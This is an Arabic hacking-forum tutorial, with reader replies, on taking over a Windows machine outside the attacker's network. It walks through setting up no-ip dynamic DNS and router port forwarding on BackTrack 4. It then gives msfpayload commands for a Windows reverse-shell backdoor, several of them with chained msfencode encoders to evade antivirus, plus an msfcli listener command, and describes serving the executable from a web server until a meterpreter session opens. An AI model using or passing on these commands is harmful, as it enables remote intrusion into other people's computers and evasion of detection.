![]() |
حصري الإختراق بال no-ip وعمل port forwarding على backtarck4 وإختراق ويندوز خارج الشبكة مرحبا بمناسبة رمضان والغياب الطويل وكسر روتين موضوع يفتح النفس للذين فقدوا الامل في المتسبلويت شرح فتح البورت في روتر sagem fast 1201 وميزة جديدة قد لا يعرفها الكثيرين أنها أصبحت تدعم no-ip في إكسبلوات تكتب عنوانك والتجربة ستكون على bt4 attacker متصل بشبكة wifi لصديق لي وويندوز فيستا victime متصل بشبكة داخلية في المنزل وكل جهاز متصل بروتر خاص به . نقوم في البداية بتحميل no-ip عن طريق synaptic http://a.imageshack.us/img839/9703/snapshot1j.png وأثناء تنصيب ستفتح لنا نافذة كما في الصورة التالية في تجربتي تركت المربع خالي حيث خيار عدم تفعيل nat يبدو أن هذه الخطوة مهمة لا أعرف ولكن عند نجاح الاختراق قمت بتبديل الأدوار ففي التجربة الاولى كان جهاز bt4 متصل من شبكة wifi عندما حاولت العكس أي ويندوز على wifi في المحاولة الاولى إذا لم تنجح قم بكتابة صح على المربع الصغير الضاهر في الصورة ستسأل كيف قم بحذف البرنامج وإعادة تثبيته http://a.imageshack.us/img832/920/sanstitreqx.jpg بعد تنصيب no -ip جاء الدور على فتح البورت في المودم في خيار nat نضغط على port fowrarding وبعد ذلك add نكتب البورت المراد استخدامه في حالتي 4444 وبعد ذلكsave http://a.imageshack.us/img443/1466/snapshot2om.png وهذه بعض خيارات msfpayload مع وبدون تشفيرة كود: ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe كود: ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/2.exe كود: ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe msfcli multi handler كود: ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 E إنشاء المتربرتر وعمل التنصت على البورت 4444 ونقل الباكدور إلى مجلد الويب سرفير ولتشغيله aplication /services / start httpd var/www http://a.imageshack.us/img820/9562/snapshot2z.png كما نرى في الصورة في team viewer نجاح تحميل الباكدور للجهاز http://a.imageshack.us/img825/7821/snapshot5x.png نقوم بتشغيله ونحصل على session meterpreter كما في الصورة ip خارجي http://a.imageshack.us/img683/5104/snapshot8z.png play slid show to see picture مكان النجوم w e b |
بارك الله فيك على الشرح واصل ابداعك |
شرح روعه بارك الله فيك |
رد: حصري الإختراق بال no-ip وعمل port forwarding على backtarck4 وإختراق ويندوز خارج الشبكة أخي لم أفهم هل هنالك فيديو |
الساعة الآن 05:55 AM |
[ vBspiders.Com Network ]